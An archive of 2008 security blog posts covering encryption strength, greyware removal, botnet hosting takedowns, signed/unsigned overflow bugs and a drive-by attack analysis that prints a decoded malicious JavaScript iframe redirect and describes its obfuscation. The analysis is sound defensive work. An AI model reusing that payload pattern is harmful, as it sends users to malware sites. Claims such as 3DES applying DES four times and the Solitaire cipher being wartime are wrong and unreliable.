Friday, 21 November 2008

Encryption - How much is enough, how much is too much?

You might expect me to say that everything should be encrypted to the hilt. Well, that would be overkill. No, the trick is finding the right level of encryption.

I have been asked in the past what would happen if someone came up with an unbreakable code. Would that be game over for Cryptanalysis? Well, I confess that I am not a specialist in crypto but I feel pretty secure in answering this one. No, it would not be game over because there are already unbreakable codes. One time pad codes are unbreakable without the message pad because all possible messages are equally possible – the same cypher text (encrypted version) could decrypt to “Move $1 million to account 43445342” or “I want to buy a painting of a goat” and there is no way to tell which from the cypher text. The way to attack those would be to try to recover the pad - the sequence of nonsense that was used to code the plain text into cypher. That could be a very private thing such as a sheet of rice paper held by only two people in the world and eaten before the attempt by a third party to decrypt the code was made. It could be very public such as letters from a book chosen at random – each day, you advance one page. One of my favourites one time pad codes is the Solitaire Cypher where the order of a pack of cards is used to cypher text. It isn't perfect because the pad repeats but it was a war time favourite because the equipment required was a pencil, a bit of paper and some ordinary playing cards. Shuffle the deck and the key is lost forever.

However, I digress. Popular codes used today are things like 3DES (sometimes pronounced Triple-DES) and AES 128 bit or 256 bit. 3DES is very big in the financial world and replaced single DES. Essentially, 3DES does what DES does 4 times, processing its own output. Are they unbreakable? Not quite. DES is fairly easy to break with the right kit. 3DES would just take longer and require more kit. AES256 would theoretically take many millions or even several billion years to crack with a single desktop system – although the 1.105 petaflop/s IBM supercomputer at Los Alamos National Laboratory might manage it a darn sight quicker. Even with that, the process would, on average, take thousands of years. Does your data need to be safe for that long?

That turns out to be one of the important questions. Imagine you are choosing encryption for a password that will be sent across the wire – and let us ignore the use of hashes for the moment. A password is valid for 1 week and then must be changed. The user can change their own password for 1 week after the old password expires. After that, the help desk have to do it. If the encryption is good enough to stand up for more than 2 weeks, then it is good enough. Making it tougher adds nothing. However, the location of a vault is unlikely to change for hundreds of years. That needs to be secret for a lot longer.

Another important question is how sensitive the data actually is. What I bought on Amazon in the last year? You can see that if you want. A trivial encryption such as ROT13 will do the job here. My interactions with my bank and my lawyer? That is more sensitive. 3DES at least. The launch code for ICBMs? Even if they change fairly often, I think that we should use a good strength cypher on those!

However, there is something about encryption that people often don't consider. It does more than hide information from prying eyes. Imagine that I am running a client that is having a conversation with a server. The request is going over the wire, perhaps via SSL, perhaps via some other scheme. I make a request and the request is coded with a shared secret key that we exchanged at the start of the session – and which is only valid for this session. I get a reply and it is junk until it is decrypted using the shared secret. There is nothing odd about that at all. Millions of systems work that way. So, what would happen if someone tried to hijack the session and inject a new request? Unless they have the shared secret, their request will be decoded into meaningless goo. Since the request probably contains an encrypted copy of some sort of sequence number, it would probably fail at the first hurdle. Knowing the shared secret is a big part of proving that I am still the client that I was at the start of the conversation.

How about if an attacker tries to replay a recording of the conversation without understanding it? The shared secret is generated per session. They have the wrong one so the replay would fail very early. A well designed protocol can protect pretty effectively against session hijacks but there are always people out there looking for even the narrowest gaps to exploit.

What are the downsides to encryption? Well, they are several. It takes time. If you are reading from a disk encrypted with BitLocker, each byte read from disk will cost you around 30 additional CPU cycles – and blow your processor cache and pipeline. Ok, that is not the end of the world but it is a cost. How about data loss though? Bob has excellent data security. All of his files are stored on a machine protected by Truecrypt, all of his mail goes via PGP and all of his ZIP files and documents have strong passwords. If Bob is a paragon of virtue then then risk is that he will be hit by a bus and that data will be lost. That could be very serious indeed. Of course, it might be that Bob is not a paragon of virtue in which case, how would anyone find out?

I recall that the police were not at all happy when BitLocker came out. Several of them at the F3 conference (First Forensic Forum) described it as a paedophile's best friend since it made offline forensics so hard to do. Encryption is a tool and like pretty much all tools, it is morally neutral. It protects good and bad people equally well. Some would argue that those who have nothing to hide need not keep secrets but I am not so sure. If I share my data with (for example) the government because it is not encrypted from them then I am relying on their ability to keep my data as safe as I have or better. Given their past performance on this, I think that I will encrypt it myself, thank you.

Signing off

Mark Long, Digital Looking Glass

Monday, 17 November 2008

Ooh, ooh, ohh, ohh, Staying Alive!

Ah, who can forget the BeeGees? I try and try. No, there is a point to the title of this blog entry. If you work with computers (a fairly safe assumption if you read this blog) then you will doubtless be familiar with the casual “You know, my computer has been acting weird. Would you mind having a look at it?”. There is a song by Tom Smith called “Doing tech support for Dad” about it. Guess what I did at the weekend? Sometimes I am lucky and the person has some interesting malware. In this case, it was interesting greyware.
Now, is greyware a class of malware? Back at Microsoft, the lawyer approved phrase was “Potentially unwanted software” because it was often software which had been installed after the user agreed to some Eula that said on page seven that it might just send your details of your web usage to a server somewhere and might show you ads for products of dubious authenticity. The lawyer’s position is that you can’t call it malware if the user agreed to install it.
So, what did we have here? A typical family system running XP Home edition, not too much memory and an older specification with all members of the family being admins on the system. Under the circumstances, the machine was remarkably clean. It was running a free AV product that had picked up that one of the DLLs loaded into every process was dodgy but every time it tried to fix it, it failed.

I spent a good few hours looking at this particular greyware (and for legal reasons, no names will be given here) and it was a resilient little devil. I would like to talk about some of the tactics that it used. However, before I do that, I would like to talk about coding styles in malware.
There are some fairly distinct styles in malware writing. The Script Kiddie and those just up from there typically lash components from different sources together into a crude botch and you can’t tell much about the kiddie. Eastern Europeans black hats are quite workman-like and the code quality is generally pretty good. They have clearly had formal training. They often borrow ideas off other malware writers, possibly those working for the same stable but I suspect that they pinch ideas off rival gangs just as often. They keep up with modern trends or set them. They generally write stealthy code with some excellent use of rootkits. Conversely, they do relatively little to hide their infrastructure and looking at the network activity generally takes you to Russia or the Ukraine in fairly short order. That could well represent a difference between the developers and the money men who coordinate gang activities. I am told that military malware from Eastern Europe follows the same patterns but it is better engineered and doesn’t lead as directly back to Eastern Europe. I have only seen a fairly limited range of military malware from the Middle East but the quality was excellent and the stealth features were even better than the Eastern European code. They clearly worked in teams with subject matter experts writing different bits of the code. A lot of money had been spent on those projects. Chinese malware uses a very different approach. It rarely has much stealth capacity. Instead, it overwhelms by sheer weight of numbers. If two variants of the code are good, then ten  are better. If one protection mechanism is good, then five are better. I am told by friends who move in places where true names are rarely given and all the players work for organisations known only by 3 letter acronyms that Chinese espionage works in very much the same way. Ten agents watching are better than two.
Anyway, I digress. This greyware proved to be Chinese and I had guessed as much from the approach. The directory where it lived was visible which made life easy… well, actually, not so much. Any attempt to delete the directory failed with a sharing violation if it was a code component – oh, I may just call any such files “PE files” which stands for Portable Executable. This covers any sort of file that can be loaded as run as native code. So, something was locking the files. A quick search showed a process that was loaded from the directory that the other known files were from so I tried to kill it with task manager but it wouldn’t die. Ok, time for the toolbox to come out. Although Sysinternals is wholly owned by Microsoft, the tools are still free and wonderful. I downloaded them and Process Explorer killed the process just fine. It was offline for less than 5 seconds before it popped up again. A check of the parent process showed it to be an instance of SVCHOST. Right, it was time to look at the services.
There were a couple of services that seemed to be stopped… how could a stopped service be doing this? I downloaded WinDbg and had a look at the service host for that service and clearly it was not stopped. I am going to look into this technique some more when I have time but it is clear that the SCM was sending service control messages which the service claimed to be processing but the status codes that it returned were out and out lies. However, that was not a problem. I could force terminate the containing service. It popped back up again, spawned by another instance of SVCHOST. Ah, ok, I had seen that trick before. Two processes each have a thread that waits on the death of its brother process. If you kill one then the thread unblocks, restarts its brother process and blocks again. The brother does the same. I knew how to deal with that thanks to Mark Russinovich, a very clever and helpful chap who it was my pleasure to meet once or twice. You can suspend all the threads in a process and that doesn’t trigger the brother process – after all, the monitored process is only sleeping, not dead. You suspend the other process and you have two frozen malicious processes. I went into the registry and killed the startup for those services and rebooted.
What the heck? Everything was back as it had been. Some investigation showed that there was a process that “repaired” the installation of the malware on each boot and then terminated. Ok, not a problem. I froze everything and used Autoruns to disable the loading of the process. Reboot – and everything is back as it had been. Resilient little sucker, isn’t it? Some ferreting around showed that this greyware registered as a shell extension and may well have had some shell functionality but the first thing that it tried to do was repair the install. It was at this point that I realised that this was more interesting than average. I started to dig deeper.

COM classes were registered with multiple different class IDs. Whichever you asked for, you got the same VTABLE. Cute. There were multiple self repair mechanisms and hooks into the system which seemed to exist solely to give the greyware a chance to self repair. Nice idea. The one that made me laugh was the protection for non-PE files. Something was waiting on each file in the directory and as the file was deleted, it just copied the file from the complete backup directory that was right there in plain sight. What happened if you tried to kill the backup directory? It was restored from the live copy.

So, the approach was clearly Chinese but the modules were compiled in Visual Studio with US settings. I was able to fish out some function names and other text and the writer clearly had a very good grasp of English. The servers that sourced the ads were in mainland China and some of the reporting went to Taiwan. All in all, this was pretty good work and much more resilient than most. There was no way that an average admin would have been able to remove this software.

In the end, I cleaned the system by booting to a WinPE image and manually cleared out the registry and deleted the directories that contained the greyware. Even the best self defence mechanisms don’t work when they are not loaded.

Had it been a commercial system, it would probably have made more sense to salvage the data and rebuild the box.
Oh, in other news, Arbor Networks say that there have been more and heavier distributed denial of service attacks this year than ever before with a peak intensity 67% above the previous high. The source? That would be Botnets… generally compromised home systems just like the one that I worked on this weekend.

So, until next time…

Singing off

Mark Long, Digital Looking Glass

Friday, 14 November 2008

Directions in cybercrime

Something is missing today. What is it? Hundreds of millions of unwanted SPAM emails. A California based hosting company, McColo Corp, had their servers blocked from the web and the volumes of SPAM nearly halved. The move seems to have been largely orchestrated by journalists and Google.

Google has a cached copy of the McColo terms of use. The following (copyright McColo and quoted as fair use) is from there:

I) Prohibited Uses
A. Utilize the Services to send mass unsolicited e-mail to third parties.

B. Utilize the Services in connection with any illegal activity. Without limiting the general application of this rule, Users may not:

(i) Utilize the Services to copy material from third parties (including text, graphics, music, videos or other copyrightable material) without proper authorization.

(ii) Utilize the Services to misappropriate or infringe the patents, copyrights, trademarks or other intellectual property rights of any third party.

(iii) Utilize the Services to traffic in illegal drugs, illegal gambling, obscene materials or other any products or services that are prohibited under applicable law.


(viii) Utilize the Services to distribute, advertise or promote software or services that have the primary purpose of encouraging or facilitating unsolicited commercial e-mail or spam.

(ix) Utilize the Services to solicit or collect, or distribute, advertise or promote, e-mail address lists for the purpose of encouraging or facilitating unsolicited commercial e-mail or spam.

(x) McColo has no restrictions on contents. Adult materials, MP3s, games, and audio/video streaming are permitted. However, customers are strictly prohibited from using egg-drops, IRC bots, warez materials and shell hosting services on McColo regular network. IRC BOT controllers are not allowed on both networks.

Oh dear... It seems that they have not been enforcing these very well at all. It seems that IRC traffic used to control the botnets has routinely been routed through McColo servers. Host Exploit are making a lot of the running on this one and they claim that the payment servers for at least 40 child porn sites are being run through McColo. McColo have no restrictions on content indeed. Here is a link to a Washington post document listing what McColo have apparently been up to. SRIZBI, the world's biggest botnet, is on there and is apparently currently uncontrolled.

An earlier disconnection (technically a depeering) of the Atrivo / Intercage servers produced a short term drop of 10% in SPAM. How short term? About 3-5 days. I would expect th drop caused by taking McColo off the air to to take a little longer because there are presumably more botnets being controlled. So, what happens next?

In the short term, I see a scramble to regain control over the botnets that have been severed from their command and control systems. We may even see some of them change hands although it is increasingly clear that many of the individual gangs ultimately serve the same master.

What about the longer term? Well, I would have thought that the gangs behind the SPAM engines would be looking to safeguard their operations. In the past, the IRC control channels (and there are other channels which I can discuss if anyone is interested)have tended to go via smaller independent IRC servers who have been reluctant to terminate the control channels since this often earned them a DDOS attack - that is to say that the botnets would be turned on them as punishment. Attacks against the control channel have largely been limited to killing the channel and hoping no-one minded all that much. By taking out whole server farms at a stroke, things have ratcheted up a whole lot. I would have thought that the botmasters would be looking to move their command mechanisms somewhere much more under their control. Emil Kacperski who ran the Atrivo / Intercage organisation and Vladimir Tsastsin who ran EstDomains may or may not have been associated with the known rogue Russian Business Network - who am I to want a libel case? Certainly, many of the operations that McColo have been hosting were formerly hosted or controlled by the now depeered Russian Business Network. So, moving operations into the west was a solution to a previous problem.

This makes things interesting. If the illegal parts are all in Russia, Estonia and the Ukraine, it is fairly easy to target them as they are concentrated in one geographic area and it is possible to effectively filter traffic although not necessarily good for international relations. If they are centered in the west then the legal framework makes it easy to shut down the operations and that is not what organised crime wants. China? They have their own agenda and it would be even easier to filter the traffic. Africa? Not a lot of bandwidth in the less controlled areas and too much law in the well controlled bits.

Now, what would I do if I were a cyber criminal? Well, they keep knocking out my single points of failure. That happened before so they built in mechanisms to cope with the loss of a single IRC channel. Now the opposition are axing whole server farms. Maybe it is time to abandon centralised control in the same way that the STORM botnet did. Ok, STORM was effectively killed by the Microsoft Malicious Software Removal Tool but it took a long time to die. What if there were multiple STORM type peer to peer botnets? Presumably Microsoft would still kill them off and they would have a limited lifespan - but isn't living defined as not dying for one more day, every day? That is what I would be working on if I were a black hat.
As for how the payment side for illegal content, I wouldn't like to guess how that will be done. All that I can say is that we are living in interesting times indeed.

I was asked a question by a client this week. She wondered what I thought the effect of the recession would be on cybercrime. Clearly, legitimate business is having to tighten their collective belts. Traditionally, SPAM has been used to sell fake medications, specifically Viagra and Cialis and dubious services such as penis enlargement guides. These can be seen as luxury goods. We may see the mix changing and adverts for treatments for high blood pressure and other necessary medications may start to dominate. Much of the Viagra sold over SPAM is fake and has never seen the inside of Pfizer's plant. What would happen if people bought fake medicines for life threatening conditions? You know that criminals would sell them.

As for more targeted attacks such as industrial espionage, well, the criminals will do what we all do when profits are lower. They will work harder.

Speaking of which, I have a report to write.

Signing off

Mark Long, Digital Looking Glass

Wednesday, 12 November 2008

Hey, it is only a warning. How important can it be?

Caveat – only of interest to C or C++ devs today.

You might think that compiler warnings are just nagging. Well, that is mostly true. If you are in a relationship, you may well have been nagged to do the washing up or empty the kitchen bin at some point. Some nagging has a point.

I am going to be talking here about the Microsoft compilers because those are the ones that I know best but the same principles apply to other compilers and even code checkers like Lint. Ah, those happy days when we could name tools in ways that amused us. Lint picked fluffs from your code and you used DDT to kill bugs. Anyway, I digress. Compilers allow you to set the warning level that they compile your code against. If you do certain things, you will get warned. I want to talk about some of those warnings.

So, let us look at one that it is probably OK to ignore:

Compiler Warning (level 4) C4201
Error Message : nonstandard extension used : nameless struct/union

Ok, this just means that you have used something which is not supported by ANSI C++. Maybe you need this to be multiplatform in which case that is probably a bad thing. Maybe you plan to change compiler at some point in the future (which I only recommend for masochists) and you want the code to stay as portable as possible. Maybe your contract demands that you use ANSI level C++ for compliance reasons. This is a minor warning but there are some pretty good reasons for at least considering what it is telling you.

How about one that we should worry about?

Compiler Warning (level 3) C4018
Error Message: 'expression' : signed/unsigned mismatch

This one has some brothers and sisters but they have the same basic pattern. You treat something as a signed and an unsigned value. Ah, but you know that the value will only ever be 0 to 40 and so what does it matter? Well, quite a bit. Let me explain how.

Imagine that we have an application that reads a data file and makes sense of it. There are millions of applications like that. So, the data is coming from a file. Further imagine that we have a buffer which is 100 bytes long – it is char[100] so element 0 to element 99 are fine. We are going to fill it from a structure that has been passed to us. You have an integer which holds the length of the buffer and a pointer to part of the file. You check that the length is less than 101. Yes it is. You read that many bytes and copy that many bytes into the array. You go on and do the next thing. All is well and there are millions of bits of code that do just that.

Why do you check the length? Because you don’t want to overflow the buffer. However, what happens if the length that is read from the file is -10,000 rather than 42, for example? Well, -10,000 is less than 100 so that check works fine. The routine that reads the file takes an unsigned value so -10,000 becomes DF80, a much larger number, 55536 to be precise. So, you read 55536 bytes from the file and copy it into the 100 byte array. Oops, that is the stack gone. If you are lucky, you will crash and your user will curse your name. However, that could only happen with a corrupt file since you also write the files and there are never negative lengths in there. It is, accordingly, a purely theoretical risk right up until someone writes a malicious file and mails it to your customer. Odds on, this will be remote code execution vulnerability. It happened with dozens of products including Abobe, Microsoft and many other household names. Linux and Unix have both had this one over and over and smarter people than me missed it.

My recommendation is that you compile all production code at the maximum warning level and document any warnings that you can’t get rid of. I would even go so far as to say that compiler warnings should be logged as bugs so that they get fixed in the next version. You might think otherwise and that is your right... and I will sell you or your client my services when you or they hot problems as a result

Signing off

Mark Long, Digital Looking Glass

Thursday, 6 November 2008

Drive-by attacks, not just for the physical world

Drive-by attacks are a common way of infecting home PCs. I have mentioned them before but they are still just as popular as they were. There seem to be some changes in the approach though.

We used to routinely see attempts to infect PCs via remote code execution vulnerabilities in the browser – this was one of the holy grails for black hats. If you had one of those, you could have a “click and you are owned” scenario. The other holy grail was a remote code execution in a service that allowed anonymous exploitation – that is to say that a particular request could be made without needing to be sent from an authorised domain account This would enable a black hat to write a worm but I digress; we are talking about Drive-by attacks.

What I used to see often is that the page that was passed back to the browser in response to the GET request would be targeted at the version of the browser version and the vulnerabilities that were current or recently patched. Storm used to do this, even creating custom binaries on the fly. Now, there was a fancy malware for you. What I am seeing more and more is that drive-bys just rely on social engineering. Here is the anatomy of a particular attack:

The come on:

These vary but a fairly common form (and the one that I was looking at) is a message on facebook claiming that someone has pictures or a video of you. It seems to come from a friend but it is very nonspecific – well, it is a hijacked account and the method is to send many of these messages and expect a low success rate. Again, that is fine since none of this cost the black hats anything.
Typically, the link will go via Google (with a unique search string) or sometimes TinyURL. Most people see the start of the URL as going to a reasonable site and follow the link if they look at all. Many don’t; these are home users.

The initial page:

This will typically just be a page of Javascript. I have seen many dozens of variants but they generally look very similar. There is a large static array of values and then a bit of jscript that decodes the array into a string. The encryption is crude in every way. Typically the array will be ASCII values with a largish offset – say 605. It is easy for the black hat to choose a different offet which means that it is not practical for pattern recognition internet security packages to look for a given pattern of values. Also, there are more ways of phrasing the code than one so the pattern is trivial to change.
The string created is then pushed through the eval function.

The payload 1:

Here is the code that it executes:

function uybhutgyaalih(query){
var url = 'http://(malicious URL)/go.php?sid=4';
if (window.XMLHttpRequest){
var dx = '1500px';
document.getElementById('o').innerHTML = '{iframe border=0 scrolling=no width=100% height=2800px src='+url+')(/iframe)';
}else if(window.ActiveXObject){
var dx = '1500px';
document.getElementById('o').innerHTML = '(iframe border=0 scrolling=no width=100% height=2800px src='+url+')(/iframe)';

Well, nothing too clever there. It takes you to another site via an iframe. Why an iFrame? Because no URL will be displayed. I have obscured the URL here but there are thousands of hosts out there. Many of them are listed here. Oh, and I replaced the angle brackets with round ones because they confused the blog spot editor.

The payload 2:

This is where the link in the iframe takes you. This is where you would expect all the cleverness to be. In this case, nothing at all clever. There was a web page with a video that was (in this case) audio only. Typically, there will be the sound track of something, often a porn film. I haven’t the expertise to identify the film from the sounds. Sorry. There was a bitmap shown over the video that said that there was a missing video codec and seemed to be a typical OK/cancel dialog for XP. In fact, the whole thing was a bitmap and clicking anywhere would download the EXE installer that would give you a nice fresh copy of an Rbot variant.

So, there was nothing at all odd or especially bright about this attack. It was a typical drive-by based on social engineering. Why do the gangs use such a simple approach? Well, that would be because it works just fine. Anything more would be an unnecessary expense.

Oh, I mentioned wormable vulnerabilities. What we saw in the past was rapidly spreading worms, typically malicious and without much of a payload although SDBot was an exception – it was actually a proper trojan client (bot) with multiple modes of operation though it was mostly used for SPAM. Anyway, traditionally worms would spread so aggressively that they would effectively form a denial of service on the network and stop their own spread. Even if they network stayed up, admins were alerted very rapidly because of the abnormal network load. We might see fast spreading worms again but I think that they will be from amateurs. I think that the professionals will go for low and slow next time. You really want to infect as much of the network as possible before detection – and I would expect the worm to install a proper multi-purpose bot, probably polymorphic to survive better – and possibly based on Storm’s peer to peer architecture to make it more robust.

Are there interesting times ahead? I suspect so.

Signing off

Mark Long, Digital Looking Glass